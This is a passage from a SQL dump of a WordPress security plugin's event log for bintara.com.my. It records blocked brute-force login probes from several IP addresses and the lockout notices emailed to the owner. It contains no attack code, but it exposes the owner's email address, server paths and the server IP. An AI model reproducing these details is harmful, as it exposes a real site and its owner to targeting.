8:\"REQUEST_TIME_FLOAT\";s:15:\"1569075841.0365\";s:12:\"REQUEST_TIME\";s:10:\"1569075841\";}}','notice','2019-09-21 14:24:02','2019-09-21 14:24:01',17846064,19336080,'https://bintara.com.my/wp/wp-login.php',1,0,'177.36.8.226'),(26250,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:24:01\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:24:01\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:24:01\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:24:01\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:24:02','2019-09-21 14:24:01',17931032,19336080,'https://bintara.com.my/wp/wp-login.php',1,0,'177.36.8.226'),(26251,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:24:02','2019-09-21 14:24:01',18137344,19336080,'https://bintara.com.my/wp/wp-login.php',1,0,'177.36.8.226'),(26252,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYyp3kXpgmG5P@iB8k9HAAAAIU\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"158.69.27.201\";s:11:\"REMOTE_PORT\";s:5:\"56754\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYyp3kXpgmG5P@iB8k9HAAAAIU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075879.5281\";s:12:\"REQUEST_TIME\";s:10:\"1569075879\";}}','notice','2019-09-21 14:24:40','2019-09-21 14:24:39',17848496,19337520,'https://bintara.com.my/2019/wp-login.php',1,0,'158.69.27.201'),(26253,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:24:39\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:24:39\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:24:39\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:24:39\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:24:40','2019-09-21 14:24:39',17933040,19337520,'https://bintara.com.my/2019/wp-login.php',1,0,'158.69.27.201'),(26254,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:24:40','2019-09-21 14:24:39',18140000,19337520,'https://bintara.com.my/2019/wp-login.php',1,0,'158.69.27.201'),(26255,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYyvViJ7D9Gn7wDPh8mKwAAAMs\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"67.198.130.240\";s:11:\"REMOTE_PORT\";s:5:\"46390\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYyvViJ7D9Gn7wDPh8mKwAAAMs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075901.5772\";s:12:\"REQUEST_TIME\";s:10:\"1569075901\";}}','notice','2019-09-21 14:25:03','2019-09-21 14:25:02',17851184,19340576,'https://bintara.com.my/blog/wp-login.php',1,0,'67.198.130.240'),(26256,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:25:02\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:25:02\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:25:02\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:25:02\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:25:04','2019-09-21 14:25:02',17935912,19340576,'https://bintara.com.my/blog/wp-login.php',1,0,'67.198.130.240'),(26257,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:25:04','2019-09-21 14:25:02',18142464,19340576,'https://bintara.com.my/blog/wp-login.php',1,0,'67.198.130.240'),(26258,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYyv1iJ7D9Gn7wDPh8mLAAAAMU\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"142.93.211.66\";s:11:\"REMOTE_PORT\";s:5:\"44518\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYyv1iJ7D9Gn7wDPh8mLAAAAMU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075903.6895\";s:12:\"REQUEST_TIME\";s:10:\"1569075903\";}}','notice','2019-09-21 14:25:05','2019-09-21 14:25:04',17848288,19338584,'https://bintara.com.my/wordpress/wp-login.php',1,0,'142.93.211.66'),(26259,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:25:04\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:25:04\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:25:04\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:25:04\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:25:05','2019-09-21 14:25:04',17933096,19338584,'https://bintara.com.my/wordpress/wp-login.php',1,0,'142.93.211.66'),(26260,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:25:05','2019-09-21 14:25:04',18139664,19338584,'https://bintara.com.my/wordpress/wp-login.php',1,0,'142.93.211.66'),(26261,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYy9XkXpgmG5P@iB8k9iQAAAI8\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.151.61\";s:11:\"REMOTE_PORT\";s:5:\"39604\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYy9XkXpgmG5P@iB8k9iQAAAI8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569075957.9985\";s:12:\"REQUEST_TIME\";s:10:\"1569075957\";}}','notice','2019-09-21 14:25:59','2019-09-21 14:25:58',17851184,19340576,'https://bintara.com.my/test/wp-login.php',1,0,'157.230.151.61'),(26262,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:25:58\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:25:58\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:25:58\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:25:58\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:25:59','2019-09-21 14:25:58',17935912,19340576,'https://bintara.com.my/test/wp-login.php',1,0,'157.230.151.61'),(26263,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:25:59','2019-09-21 14:25:58',18142464,19340576,'https://bintara.com.my/test/wp-login.php',1,0,'157.230.151.61'),(26264,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYzNliJ7D9Gn7wDPh8meQAAAM8\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"198.1.66.35\";s:11:\"REMOTE_PORT\";s:5:\"40978\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYzNliJ7D9Gn7wDPh8meQAAAM8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076022.9268\";s:12:\"REQUEST_TIME\";s:10:\"1569076022\";}}','notice','2019-09-21 14:27:04','2019-09-21 14:27:03',17848760,19337528,'https://bintara.com.my/wordpress/wp-login.php',1,0,'198.1.66.35'),(26265,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:27:03\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:27:03\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:27:03\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:27:03\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:27:04','2019-09-21 14:27:03',17933576,19337528,'https://bintara.com.my/wordpress/wp-login.php',1,0,'198.1.66.35'),(26266,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:27:04','2019-09-21 14:27:03',18139904,19337528,'https://bintara.com.my/wordpress/wp-login.php',1,0,'198.1.66.35'),(26267,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 